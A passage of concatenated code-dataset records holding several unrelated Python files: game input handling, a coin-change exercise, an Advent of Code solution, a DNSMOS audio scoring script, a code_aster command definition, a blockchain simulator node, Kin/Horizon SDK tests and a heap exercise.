2\r\n\t\t\t\tglobalDict[\"state\"][\"current_player\"][\"status\"][\"current_item\"] = \"2\"\r\n\t\t\t\t\r\n\t\t\t# Item 3\r\n\t\t\tif S_item_3:\r\n\t\t\t\tO_data[\"current_item\"] = 3\r\n\t\t\t\tglobalDict[\"state\"][\"current_player\"][\"status\"][\"current_item\"] = \"3\"\r\n\t\t\t\t\r\n\t\t\t# Item 4\r\n\t\t\tif S_item_4:\r\n\t\t\t\tO_data[\"current_item\"] = 4\r\n\t\t\t\tglobalDict[\"state\"][\"current_player\"][\"status\"][\"current_item\"] = \"4\"\r\n\t\t\r\n\t\t### Move ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t### Vertical move ###\r\n\t\t\t# None\r\n\t\t\tif not S_up and not S_down or S_up and S_down:\r\n\t\t\t\tO_input[\"move_vertical\"] = \"none\"\r\n\t\t\t# Up\r\n\t\t\tif S_up and not S_down:\r\n\t\t\t\tO_input[\"move_vertical\"] = \"up\"\r\n\t\t\t# Down\r\n\t\t\tif not S_up and S_down:\r\n\t\t\t\tO_input[\"move_vertical\"] = \"down\"\r\n\t\t\t\t\r\n\t\t\t### Horizontal move ###\r\n\t\t\t# None\r\n\t\t\tif not S_left and not S_right or S_left and S_right:\r\n\t\t\t\tO_input[\"move_horizontal\"] = \"none\"\r\n\t\t\t# Left\r\n\t\t\tif S_left and not S_right:\r\n\t\t\t\tO_input[\"move_horizontal\"] = \"left\"\r\n\t\t\t# Right\r\n\t\t\tif not S_left and S_right:\r\n\t\t\t\tO_input[\"move_horizontal\"] = \"right\"\r\n\t\t\r\n\t\t### Run ###\r\n\t\tif True:\r\n\t\t\t# On\r\n\t\t\tif S_run:\r\n\t\t\t\tO_input[\"is_running\"] = True\r\n\t\t\t# Off\r\n\t\t\tif not S_run:\r\n\t\t\t\tO_input[\"is_running\"] = False\r\n\t\t\r\n\t\t### Use ###\r\n\t\tif True:\r\n\t\t\t# On\r\n\t\t\tif S_use:\r\n\t\t\t\tO_input[\"is_using\"] = True\r\n\t\t\t# Off\r\n\t\t\tif not S_use:\r\n\t\t\t\tO_input[\"is_using\"] = False\r\n\t\t\t\r\n\t\t### Shoot ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# On\r\n\t\t\tif S_shoot:\r\n\t\t\t\tO_input[\"is_shooting\"] = True\r\n\t\t\t\t\r\n\t\t\t# Off\r\n\t\t\tif not S_shoot:\r\n\t\t\t\tO_input[\"is_shooting\"] = False\r\n\t\t\t\t\r\n\t\t### Reload ###\r\n\t\tif True:\r\n\t\t\t\r\n\t\t\t# On\r\n\t\t\tif S_reload:\r\n\t\t\t\tO_input[\"is_reloading\"] = True\r\n\t\t\t\t\r\n\t\t\t# Off\r\n\t\t\tif not S_reload:\r\n\t\t\t\tO_input[\"is_reloading\"] = False\r\n\t\t\t\t\r\n\tpass\r\n\r\n","repo_name":"PlumpMath/bge_dw","sub_path":"scripts/player/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":13218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30899528783","text":"from rit_lib import *\n\n\n# the RIT-style struct to represent coins\nCoin = struct_type(\"Coin\",\n (str, \"name\"),\n (int, \"value\"))\n\n\n# the RIT-style struct to represent coin rolls\nCoinRoll = struct_type(\"CoinRoll\",\n (Coin, \"coin\"),\n (int, \"qty\"))\n\n\ndef find_biggest_coin(coins, amount):\n \"\"\"\n Finds the biggest coin that is smaller than the specified amount.\n :param coins: The coins from which to choose. 
Must be sorted from smallest\n to largest denomination.\n :param amount: The amount for which to make change.\n :return: The largest coin that is smaller than the amount.\n \"\"\"\n biggest = coins[0] # assume that the first coin is the biggest\n\n for i in range(1, len(coins)):\n coin = coins[i] # get the next coin in the list\n if coin.value <= amount: # if the value is less than the amount...\n biggest = coin # ...it is now the biggest coin\n\n # make sure to return biggest (not coin...oops)\n return biggest\n\n\ndef make_change(coins, amount):\n \"\"\"\n Given the coins, make change for the specified amount.\n :param coins: The coin denominations to use when making change.\n :param amount: The amount for which to make change.\n :return: The coin rolls containing the coins and quantities for the change.\n \"\"\"\n rolls = {} # an empty dictionary of coin denominations to coin rolls\n\n # continue while there is change left to be made\n while amount > 0:\n # find the biggest coin that is smaller than the amount\n coin = find_biggest_coin(coins, amount)\n\n # if a roll for that coin is already in the rolls dictionary\n if coin.value in rolls:\n # fetch the roll\n roll = rolls[coin.value]\n else:\n # otherwise create a new roll and add it to the dictionary with\n # the coin's value as the key (can't use the coin itself because\n # RIT-style structs can't be used as keys in a dictionary).\n roll = CoinRoll(coin, 0)\n rolls[coin.value] = roll\n\n # update the quantity of coins in the rolls\n roll.qty = roll.qty + 1\n # deduct the coin's value from the amount\n amount = amount - coin.value\n\n # copy the coin rolls into a list and return it\n new_rolls = []\n for coin in rolls:\n new_rolls += [rolls[coin]]\n return new_rolls\n\n\ndef main():\n \"\"\"\n Prompts the user to enter a country to use for currency denomination and\n an amount for which to make change, then calculates the change and prints\n the result.\n :return:\n \"\"\"\n\n # prompt the user for the country (coin data is in data/.txt)\n coin_filename = \"data/\" + input(\"Enter country: \") + \".txt\"\n\n # create an empty list to hold the coins\n coins = []\n # loop through the lines in the file\n coin_file = open(coin_filename, 'r')\n for line in coin_file:\n # use the coin data to create a new coin and add it to the list of\n # coins\n line = line.strip() # namevalue\n tokens = line.split() # [name, value]\n coin = Coin(tokens[0], int(tokens[1]))\n coins += [coin]\n\n # at this point the coins should be sorted by value from smallest to\n # largest, but I'm cheating by putting them in the currency file in sorted\n # order to start.\n\n # prompt the user to enter the amount for which to make change\n amount = int(input(\"Enter amount: \"))\n\n # make the change\n rolls = make_change(coins, amount)\n # print the rolls\n for roll in rolls:\n print(roll)\n\n\nif __name__ == '__main__':\n main()","repo_name":"solarphinn/CS1Python","sub_path":"Week09-dictionaries-structs/make_change.py","file_name":"make_change.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39357550528","text":"import sys\nfile = open(sys.argv[1])\ninputList = list(map(int, file.readline().split(\",\")))\n\n\ncurrentPosition = 0\nskipSize = 0\nlistSize = 256\nlistNums = list(range(listSize))\n\nfor num in inputList:\n\t\tif(num <= listSize):\n\t\t\t#reverse the chunk of list\n\t\t\treverseList\t= None\n\t\t\tif(num + currentPosition > 
listSize):\n\t\t\t\tpullFromFront = (num + currentPosition\t) - listSize\n\t\t\t\treverseList = listNums[currentPosition\t: listSize]\n\t\t\t\treverseList += (listNums[0:pullFromFront])\n\t\t\t\treverseList.reverse()\n\n\n\t\t\telse:\n\t\t\t\treverseList = listNums[currentPosition:currentPosition+num]\n\t\t\t\treverseList.reverse()\n\n\n\t\t\ttempIndex = currentPosition\t\n\t\t\tfor item in reverseList:\n\t\t\t\t\tif(tempIndex >= listSize):\n\t\t\t\t\t\ttempIndex\t = 0\n\t\t\t\t\tlistNums[tempIndex] = item\n\t\t\t\t\ttempIndex\t+= 1\n\t\t\t\n\t\t\tcurrentPosition\t+= skipSize\t+ num\n\t\t\tskipSize+=1\n\t\t\twhile (currentPosition\t>= listSize):\n\t\t\t\tcurrentPosition\t -= listSize\n\n\t\t\tprint(\"listnums:{} currentPosition:{} currentValue:{} skipSize:{}\\n\\n\\n\".format(listNums, currentPosition\t, listNums[currentPosition], skipSize))\n\nprint(listNums[0]*listNums[1])\n\n\n","repo_name":"natahlieb/adventofcode2017","sub_path":"Day10/day10.0.py","file_name":"day10.0.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11111897037","text":"import argparse\nimport os\nfrom typing import List, Tuple\n\nimport numpy as np\nfrom torch import Tensor\n\nfrom df.io import load_audio\nfrom df.logger import init_logger, log_metrics\nfrom df.scripts.dnsmos import SR, get_ort_session, isclose\nfrom df.utils import download_file, get_cache_dir\n\nURL_ONNX = \"https://github.com/microsoft/DNS-Challenge/raw/82f1b17e7776a43eee395d0f45bae8abb700ad00/DNSMOS/DNSMOS/\"\n# Coefficients for polynomial fitting\nP_SIG = np.poly1d([-0.08397278, 1.22083953, 0.0052439])\nP_BAK = np.poly1d([-0.13166888, 1.60915514, -0.39604546])\nP_OVR = np.poly1d([-0.06766283, 1.11546468, 0.04602535])\nNAMES = (\"SIG\", \"BAK\", \"OVL\")\nINPUT_LENGTH = 9.01\n\n\ndef main(args):\n    file: str = args.file\n    verbose = args.debug\n    target_mos: List[float] = args.target_mos\n    audio = load_audio(file, sr=SR, verbose=verbose)[0].squeeze(0)\n    sig_bak_ovr = download_onnx_model()\n    dnsmos = dnsmos_local(audio, sig_bak_ovr)\n    log_metrics(\"Predicted\", {n: v for (n, v) in zip(NAMES, dnsmos)})\n    if target_mos is not None:\n        if len(target_mos) > 0:\n            assert len(target_mos) == len(dnsmos)\n            log_metrics(\"Target   \", {n: v for (n, v) in zip(NAMES, target_mos)})\n            for d, t in zip(dnsmos, target_mos):\n                if not isclose(d, t):\n                    diff = (np.asarray(target_mos) - np.asarray(dnsmos)).tolist()\n                    log_metrics(\"Diff     \", {n: v for (n, v) in zip(NAMES, diff)}, level=\"ERROR\")\n                    exit(2)\n    exit(0)\n\n\ndef download_onnx_model():\n    cache_dir = get_cache_dir()\n    if not os.path.isdir(cache_dir):\n        os.makedirs(cache_dir)\n    name = \"sig_bak_ovr.onnx\"\n    onnx = os.path.join(cache_dir, name)\n    if not os.path.exists(onnx):\n        onnx = download_file(URL_ONNX + name, download_dir=cache_dir)\n    return onnx\n\n\ndef dnsmos_local(audio: Tensor, onnx: str) -> Tuple[float, float, float]:\n    assert len(audio) >= SR, f\"Audio too short: {audio.shape}\"\n\n    session = get_ort_session(onnx)\n\n    if len(audio) < INPUT_LENGTH * SR:\n        audio = np.pad(audio, (0, int(INPUT_LENGTH * SR - len(audio))), mode=\"wrap\")\n    num_hops = int(np.floor(len(audio) / SR) - INPUT_LENGTH) + 1\n    hop_len_samples = SR\n    predicted_mos_sig_seg = []\n    predicted_mos_bak_seg = []\n    predicted_mos_ovr_seg = []\n    assert num_hops > 0\n\n    for idx in range(num_hops):\n        audio_seg = audio[int(idx * hop_len_samples) : int((idx + INPUT_LENGTH) * hop_len_samples)]\n        if len(audio_seg) < INPUT_LENGTH * SR:\n            continue\n        
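# Each 9.01 s window is scored on its own: the raw waveform segment goes into the\n        # ONNX model below, and the raw per-window scores are mapped through the fitted\n        # polynomials (P_SIG/P_BAK/P_OVR) before being averaged over all windows.\n        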
input_features = np.array(audio_seg).astype(\"float32\")[np.newaxis, :]\n        oi = {\"input_1\": input_features}\n\n        mos_sig_raw, mos_bak_raw, mos_ovr_raw = session.run(None, oi)[0][0]\n\n        mos_sig = P_SIG(mos_sig_raw)\n        mos_bak = P_BAK(mos_bak_raw)\n        mos_ovr = P_OVR(mos_ovr_raw)\n\n        predicted_mos_sig_seg.append(mos_sig)\n        predicted_mos_bak_seg.append(mos_bak)\n        predicted_mos_ovr_seg.append(mos_ovr)\n\n    mod_sig = np.mean(predicted_mos_sig_seg)\n    mod_bak = np.mean(predicted_mos_bak_seg)\n    mod_ovr = np.mean(predicted_mos_ovr_seg)\n    return mod_sig, mod_bak, mod_ovr\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--target-mos\", \"-t\", type=float, nargs=\"*\")\n    parser.add_argument(\"--debug\", \"-d\", \"-v\", action=\"store_true\")\n    parser.add_argument(\"file\", type=str, help=\"Path to audio file for DNSMOS evaluation.\")\n    args = parser.parse_args()\n    init_logger(level=\"DEBUG\" if args.debug else \"INFO\")\n    main(args)\n","repo_name":"Rikorose/DeepFilterNet","sub_path":"DeepFilterNet/df/scripts/dnsmos_v2.py","file_name":"dnsmos_v2.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":1512,"dataset":"github-code","pt":"72"} +{"seq_id":"20426608281","text":"from ..Commons import *\nfrom ..Language.DataStructure import *\nfrom ..Language.Syntax import *\n\n\ndef combinaison_charge_prod(self, TABLE_RESU, **args):\n    \"\"\"Typing of the result concept\"\"\"\n    if args.get(\"__all__\"):\n        return table_sdaster\n\n    for m in TABLE_RESU:\n        self.type_sdprod(m[\"TABLE\"], table_sdaster)\n\n\nCOMBINAISON_CHARGE = MACRO(\n    nom=\"COMBINAISON_CHARGE\",\n    op=OPS(\"code_aster.MacroCommands.combinaison_charge_ops.combinaison_charge_ops\"),\n    sd_prod=combinaison_charge_prod,\n    fr=tr(\"Combinaison des calculs avec des chargements mécaniques et thermiques \"),\n    MODELE_MECA=SIMP(statut=\"o\", typ=modele_sdaster),\n    MODELE_THER=SIMP(statut=\"f\", typ=modele_sdaster),\n    CHAM_MATER_MECA=SIMP(statut=\"o\", typ=cham_mater),\n    CARA_ELEM_MECA=SIMP(statut=\"o\", typ=cara_elem),\n    CARA_ELEM_THER=SIMP(statut=\"f\", typ=cara_elem),\n    BLOC=SIMP(statut=\"o\", typ=(char_meca, char_cine_meca)),\n    BLOC_THER=SIMP(statut=\"f\", typ=(char_meca, char_cine_meca)),\n    EXCIT_MECA=FACT(\n        statut=\"o\",\n        max=\"**\",\n        CHAR_MECA=SIMP(statut=\"o\", typ=(char_meca, char_cine_meca)),\n        NOM_CHAR=SIMP(statut=\"o\", typ=\"TXM\"),\n    ),\n    EXCIT_THER=FACT(\n        statut=\"f\",\n        max=\"**\",\n        CHAM_MATER_THER=SIMP(statut=\"o\", typ=cham_mater),\n        NOM_CHAR=SIMP(statut=\"o\", typ=\"TXM\"),\n    ),\n    LIST_INST_THER=SIMP(statut=\"f\", typ=(listr8_sdaster, list_inst)),\n    COMPORTEMENT=FACT(\n        statut=\"f\",\n        max=\"**\",\n        regles=(UN_PARMI(\"TOUT\", \"GROUP_MA\"),),\n        TOUT=SIMP(statut=\"f\", typ=\"TXM\", into=(\"OUI\",)),\n        GROUP_MA=SIMP(statut=\"f\", typ=grma, validators=NoRepeat(), max=\"**\"),\n        RELATION=SIMP(statut=\"f\", typ=\"TXM\", defaut=\"ELAS\", into=(\"ELAS\", \"MULTIFIBRE\", \"CABLE\")),\n    ),\n    TABLE_COEF=SIMP(statut=\"o\", typ=table_sdaster),\n    CHAM_RESU=FACT(\n        statut=\"o\",\n        max=\"**\",\n        NOM_CHAM=SIMP(statut=\"o\", typ=\"TXM\", validators=NoRepeat(), into=C_NOM_CHAM_INTO()),\n        NOM_CMP=SIMP(statut=\"o\", typ=\"TXM\", validators=NoRepeat(), max=\"**\"),\n    ),\n    TABLE_RESU=FACT(\n        statut=\"o\",\n        max=3,\n        UNITE=SIMP(statut=\"f\", typ=UnitType(), inout=\"out\"),\n        OPTION=SIMP(statut=\"o\", typ=\"TXM\", into=(\"COEF_COMB\", \"CALC_COMB\", \"EXTREMA\")),\n        TABLE=SIMP(statut=\"o\", typ=CO),\n        b_extrema=BLOC(\n            condition=\"\"\"equal_to(\"OPTION\", 
'EXTREMA')\"\"\",\n CRIT_COMP=SIMP(\n statut=\"f\",\n typ=\"TXM\",\n defaut=\"TOUT\",\n validators=NoRepeat(),\n max=\"**\",\n into=(\"TOUT\", \"MAXI\", \"MAXI_ABS\", \"MINI\", \"MINI_ABS\"),\n ),\n ),\n ),\n IMPRESSION=SIMP(statut=\"f\", typ=\"TXM\", defaut=\"NON\", into=(\"OUI\", \"NON\")),\n b_impression=BLOC(\n condition=\"\"\"equal_to(\"IMPRESSION\", 'OUI')\"\"\",\n UNITE=SIMP(statut=\"o\", typ=UnitType(), inout=\"out\"),\n ),\n)\n","repo_name":"Krande/code-aster-copy","sub_path":"code_aster/Cata/Commands/combinaison_charge.py","file_name":"combinaison_charge.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73842157354","text":"from Models.Ethereum.Block import Block\nfrom Models.Node import Node as BaseNode\n\n\n#from ImportClasses import Block\nclass Node(BaseNode):\n def __init__(self,id,hashPower): #blockchain=[],transactionsPool=[],unclechain=[],blocks=0,balance=0,uncles=0,hashPower=0.0):\n\n '''Initialize a new miner named name with hashrate measured in hashes per second.'''\n super().__init__(id)#,blockchain,transactionsPool,blocks,balance)\n self.hashPower = hashPower\n self.unclechain = []\n self.uncles= 0 # total number of uncle blocks included in the main chain\n self.blockchain= []# create an array for each miner to store chain state locally\n self.transactionsPool= []\n self.blocks= 0# total number of blocks mined in the main chain\n self.balance= 0# to count all reward that a miner made, including block rewards + uncle rewards + transactions fees\n\n\n def generate_gensis_block():\n from InputsConfig import InputsConfig as p\n for node in p.NODES:\n node.blockchain.append(Block())\n \n # This to allow miners to include uncle blocks in their main blocks\n def add_uncles(miner):\n from InputsConfig import InputsConfig as p\n maxUncles = p.Buncles\n uncles=[]\n\n j=0\n while j < len (miner.unclechain):\n uncleDepth = miner.unclechain[j].depth\n blockDepth = miner.last_block().depth\n if maxUncles>0 and uncleDepth > blockDepth - p.Ugenerations : # to check if uncle block is received and there is space to include it, also check within 6 generation\n uncles.append(miner.unclechain[j])\n del miner.unclechain[j] # delete uncle after inclusion\n j-=1\n maxUncles-=1 # decrease allowable uncles by 1\n j+=1\n\n return uncles\n\n\n ########################################################### reset the state of blockchains for all nodes in the network (before starting the next run) ###########################################################################################\n def resetState():\n from InputsConfig import InputsConfig as p\n for node in p.NODES:\n node.blockchain= [] # create an array for each miner to store chain state locally\n node.transactionsPool= []\n node.unclechain = []\n node.blocks=0 # total number of blocks mined in the main chain\n node.uncles=0 # total number of uncle blocks included in the main chain\n node.balance= 0 # to count all reward that a miner made\n","repo_name":"maher243/BlockSim","sub_path":"Models/Ethereum/Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"72"} +{"seq_id":"14065847911","text":"import pytest\nfrom requests.adapters import DEFAULT_POOLSIZE\n\nfrom stellar_base.horizon import HORIZON_TEST, HORIZON_LIVE\nfrom kin.stellar.errors import *\nfrom kin.stellar.horizon import (\n Horizon,\n check_horizon_reply,\n 
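# configuration defaults, asserted against in the construction tests below\n    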
DEFAULT_REQUEST_TIMEOUT,\n DEFAULT_NUM_RETRIES,\n DEFAULT_BACKOFF_FACTOR,\n USER_AGENT,\n)\n\n\ndef test_check_horizon_reply():\n reply = {\n 'type': HORIZON_NS_PREFIX + HorizonErrorType.TRANSACTION_FAILED,\n 'status': 400,\n 'title': 'title',\n 'extras': {\n 'result_codes': {\n 'operations': [PaymentResultCode.NO_TRUST],\n 'transaction': TransactionResultCode.FAILED\n }\n }\n }\n with pytest.raises(HorizonError) as exc_info:\n check_horizon_reply(reply)\n assert exc_info.value.type == HorizonErrorType.TRANSACTION_FAILED\n\n reply = \"{'a':'b'}\"\n check_horizon_reply(reply)\n\n\ndef test_defaults():\n horizon = Horizon.testnet()\n assert horizon\n assert horizon.horizon_uri == HORIZON_TEST\n\n horizon = Horizon.livenet()\n assert horizon\n assert horizon.horizon_uri == HORIZON_LIVE\n\n\ndef test_create_default():\n horizon = Horizon()\n assert horizon\n assert horizon.horizon_uri == HORIZON_TEST\n assert horizon.request_timeout == DEFAULT_REQUEST_TIMEOUT\n assert horizon._session\n assert horizon._session.headers['User-Agent'] == USER_AGENT\n assert horizon._session.adapters['http://']\n assert horizon._session.adapters['https://']\n adapter = horizon._session.adapters['http://']\n assert adapter.max_retries\n assert adapter.max_retries.total == DEFAULT_NUM_RETRIES\n assert adapter.max_retries.backoff_factor == DEFAULT_BACKOFF_FACTOR\n assert adapter.max_retries.redirect == 0\n assert adapter._pool_connections == DEFAULT_POOLSIZE\n assert adapter._pool_maxsize == DEFAULT_POOLSIZE\n\n\ndef test_create_custom():\n horizon_uri = 'horizon_uri'\n pool_size = 5\n num_retries = 10\n request_timeout = 30\n backoff_factor = 5\n horizon = Horizon(horizon_uri=horizon_uri, pool_size=pool_size, num_retries=num_retries,\n request_timeout=request_timeout, backoff_factor=backoff_factor)\n assert horizon\n assert horizon.horizon_uri == horizon_uri\n assert horizon.request_timeout == request_timeout\n assert horizon._session.headers['User-Agent'] == USER_AGENT\n adapter = horizon._session.adapters['http://']\n assert adapter.max_retries.total == num_retries\n assert adapter.max_retries.backoff_factor == backoff_factor\n assert adapter.max_retries.redirect == 0\n assert adapter._pool_connections == pool_size\n assert adapter._pool_maxsize == pool_size\n\n\ndef test_account(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.account('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account(address)\n assert reply\n assert reply['id']\n\n\ndef test_account_effects(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.account_effects('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account_effects(address)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_account_offers(test_sdk):\n # does not raise on nonexistent account!\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account_offers(address)\n assert reply\n assert reply['_embedded']\n\n\ndef test_account_operations(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.account_operations('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account_operations(address)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_account_transactions(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n 
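# a malformed account id is expected to surface as a 404 (NOT_FOUND) from Horizon\n        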
test_sdk.horizon.account_transactions('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account_transactions(address)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_account_payments(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.account_payments('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n address = test_sdk.get_address()\n reply = test_sdk.horizon.account_payments(address)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_transactions(test_sdk):\n reply = test_sdk.horizon.transactions()\n assert reply\n assert reply['_embedded']['records']\n\n\ndef get_first_tx_hash(test_sdk):\n if not hasattr(test_sdk, 'first_tx_hash'):\n reply = test_sdk.horizon.account_transactions(test_sdk.get_address())\n assert reply\n tx = reply['_embedded']['records'][0]\n assert tx['hash']\n test_sdk.first_tx_hash = tx['hash']\n return test_sdk.first_tx_hash\n\n\ndef test_transaction(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.transaction('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n tx_id = get_first_tx_hash(test_sdk)\n reply = test_sdk.horizon.transaction(tx_id)\n assert reply\n assert reply['id'] == tx_id\n\n assert reply['operation_count'] == 1\n\n\ndef test_transaction_effects(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.transaction_effects('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n tx_id = get_first_tx_hash(test_sdk)\n reply = test_sdk.horizon.transaction_effects(tx_id)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_transaction_operations(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.transaction_operations('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n tx_id = get_first_tx_hash(test_sdk)\n reply = test_sdk.horizon.transaction_operations(tx_id)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_transaction_payments(test_sdk):\n with pytest.raises(HorizonError) as exc_info:\n test_sdk.horizon.transaction_payments('bad')\n assert exc_info.value.type == HorizonErrorType.NOT_FOUND\n\n tx_id = get_first_tx_hash(test_sdk)\n reply = test_sdk.horizon.transaction_payments(tx_id)\n assert reply\n assert reply['_embedded']['records']\n\n\ndef test_order_book(setup, test_sdk):\n params = {\n 'selling_asset_type': 'credit_alphanum4',\n 'selling_asset_code': setup.test_asset.code,\n 'selling_asset_issuer': setup.test_asset.issuer,\n 'buying_asset_type': 'native',\n 'buying_asset_code': 'XLM',\n }\n reply = test_sdk.horizon.order_book(params=params)\n assert reply\n assert reply['base']['asset_code'] == setup.test_asset.code\n\n\ndef test_trades(setup, test_sdk):\n if setup.type == 'testnet': # TODO: returns 404 for local horizon\n # all trades\n reply = test_sdk.horizon.trades()\n assert reply['_embedded']['records']\n\n # specific trades (taken from tesnet horizon)\n params = {\n 'base_asset_type': 'credit_alphanum4',\n 'base_asset_code': 'BTC',\n 'base_asset_issuer': 'GBB7JKBP5ZG7UUHAOYDOHQMIVDRKNMXTCDU3WUDVRV77NZJBEJNL4F2H',\n 'counter_asset_type': 'credit_alphanum4',\n 'counter_asset_code': 'XLM',\n 'counter_asset_issuer': 'GBB7JKBP5ZG7UUHAOYDOHQMIVDRKNMXTCDU3WUDVRV77NZJBEJNL4F2H',\n }\n reply = test_sdk.horizon.trades(params=params)\n assert reply['_embedded']['records']\n\n\ndef test_ledgers(test_sdk):\n reply = 
test_sdk.horizon.ledgers()\n    assert reply\n    assert reply['_embedded']['records']\n\n\ndef test_ledger(test_sdk):\n    with pytest.raises(HorizonError) as exc_info:\n        test_sdk.horizon.ledger('bad')\n    assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n    reply = test_sdk.horizon.ledger(2)\n    assert reply\n    assert reply['sequence'] == 2\n\n\ndef test_ledger_effects(test_sdk):\n    with pytest.raises(HorizonError, match='Bad Request') as exc_info:\n        test_sdk.horizon.ledger_effects('bad')\n    assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n    reply = test_sdk.horizon.ledger_effects(2)\n    assert reply\n    assert reply['_embedded']\n\n\ndef test_ledger_operations(test_sdk):\n    with pytest.raises(HorizonError) as exc_info:\n        test_sdk.horizon.ledger_operations('bad')\n    assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n    reply = test_sdk.horizon.ledger_operations(2)\n    assert reply\n    assert reply['_embedded']\n\n\ndef test_ledger_payments(test_sdk):\n    with pytest.raises(HorizonError) as exc_info:\n        test_sdk.horizon.ledger_payments('bad')\n    assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n    reply = test_sdk.horizon.ledger_payments(2)\n    assert reply\n    assert reply['_embedded']\n\n\ndef test_effects(test_sdk):\n    reply = test_sdk.horizon.effects()\n    assert reply\n    assert reply['_embedded']['records']\n\n\ndef test_operations(test_sdk):\n    reply = test_sdk.horizon.operations()\n    assert reply\n    assert reply['_embedded']['records']\n\n\ndef test_operation(test_sdk):\n    with pytest.raises(HorizonError) as exc_info:\n        test_sdk.horizon.operation('bad')\n    assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n    reply = test_sdk.horizon.operations()\n    op_id = reply['_embedded']['records'][0]['id']\n\n    reply = test_sdk.horizon.operation(op_id)\n    assert reply\n    assert reply['id'] == op_id\n\n\ndef test_operation_effects(test_sdk):\n    with pytest.raises(HorizonError) as exc_info:\n        test_sdk.horizon.operation_effects('bad')\n    assert exc_info.value.type == HorizonErrorType.BAD_REQUEST # not 'Resource Missing'!\n\n    reply = test_sdk.horizon.operations()\n    op_id = reply['_embedded']['records'][0]['id']\n\n    reply = test_sdk.horizon.operation_effects(op_id)\n    assert reply\n    assert reply['_embedded']['records']\n\n\ndef test_payments(test_sdk):\n    reply = test_sdk.horizon.payments()\n    assert reply\n    assert reply['_embedded']['records']\n\n\ndef test_assets(test_sdk):\n    # TODO: 'Resource Missing' with local docker\n    # reply = test_sdk.horizon.assets()\n    # assert reply\n    # assert reply['_embedded']['records']\n    pass\n\n\ndef test_horizon_error_hashable(test_sdk):\n    err_dict = dict(title='title',\n                    status=400,\n                    detail='detail',\n                    instance='instance',\n                    extras={},\n                    type=HORIZON_NS_PREFIX + HorizonErrorType.BAD_REQUEST)\n    e = HorizonError(err_dict)\n    {e: 1} # shouldn't fail on unhashable type\n","repo_name":"kinecosystem/kin-sdk-python","sub_path":"test/test_horizon.py","file_name":"test_horizon.py","file_ext":"py","file_size_in_byte":10967,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"71891959912","text":"import sys\r\nimport heapq\r\ninput = sys.stdin.readline\r\n\r\nabs_heap = []\r\nN = int(input())\r\nfor _ in range(N): \r\n    x = int(input())\r\n    if x == 0: \r\n        if abs_heap == []: \r\n            print(0)\r\n        else: \r\n            # if several share the same absolute value, the smaller one comes out first -> automatic \r\n            print(heapq.heappop(abs_heap)[1]) # print the actual 
